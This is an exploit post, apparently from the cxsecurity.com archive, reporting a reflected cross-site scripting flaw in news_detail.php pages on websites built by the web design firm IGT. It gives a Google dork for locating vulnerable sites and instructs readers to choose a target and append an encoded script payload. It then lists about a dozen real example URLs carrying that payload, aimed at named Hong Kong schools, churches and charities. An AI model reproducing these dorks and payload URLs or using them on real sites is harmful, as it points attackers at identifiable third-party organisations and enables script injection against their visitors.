科擎科技有限公司 (IGT) Cross Site Scripting

2016.01.15
Credit: modiret
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |----------------------In The Name Of God------------------------| |[+] Exploit Title: 科擎科技有限公司 (IGT) Cross Site Scripting |[+] |[+] Exploit Author: modiret |[+] |[+] Vendor Homepage: http://www.igears.net/ |[+] |[+] Google Dork: intext:"網頁設計及維護 科擎科技有限公司" news_detail |[+] |[+] Tested on: Win 10 / Mozilla Firefox |[+] |[+] Date: 2016 14 January |[+] |--------------------------------------------------------------| |[+] Exploit: |[+] Search dork and choose a target and add "%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28976432%29%3c%2fScRiPt%3e" after URL! |[+] To see Vulnerability! |--------------------------------------------------------------| |[+] Examples : |[+] |[+] http://www.choiming.edu.hk/news_detail.php?pkey=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28972209%29%3c%2fScRiPt%3e |[+] |[+] http://www.gracefield.edu.hk/news_detail.php?p=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28922014%29%3c%2fScRiPt%3e |[+] |[+] http://www.hkgamblers-recovery.org/news_detail.php?p=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28922014%29%3c%2fScRiPt%3e |[+] |[+] http://www.hkecss.org/news_detail.php?pkey=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28947945%29%3c%2fScRiPt%3e |[+] |[+] http://www.ssbc.org.hk/news_detail.php/%F6%22%20onmouseover=prompt%28996751%29%20 |[+] |[+] http://www.xiyaosswkg.edu.hk/news_detail.php?p=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28922014%29%3c%2fScRiPt%3e |[+] |[+] http://www.taktinur.edu.hk/news_detail.php?pkey=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28915202%29%3c%2fScRiPt%3e |[+] |[+] http://www.reconnect.hk/news_detail.php?pkey=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28903527%29%3c%2fScRiPt%3e |[+] |[+] http://www.ccchhktc.com/news_detail.php?pkey=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28976432%29%3c%2fScRiPt%3e |[+] |[+] http://www.community-hkecss.org/news_detail.php?pkey=%27%22%28%29%26%251%3CScRiPt%20%3Eprompt%28976432%29%3C%2fScRiPt%3E |[+] |[+] http://www.yuenlongchurch.org/news_detail.php?p=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28922014%29%3c%2fScRiPt%3e |[+] |[+] http://www.hknlc.org/news_detail.php?pkey=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28984260%29%3c%2fScRiPt%3e |[+] |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top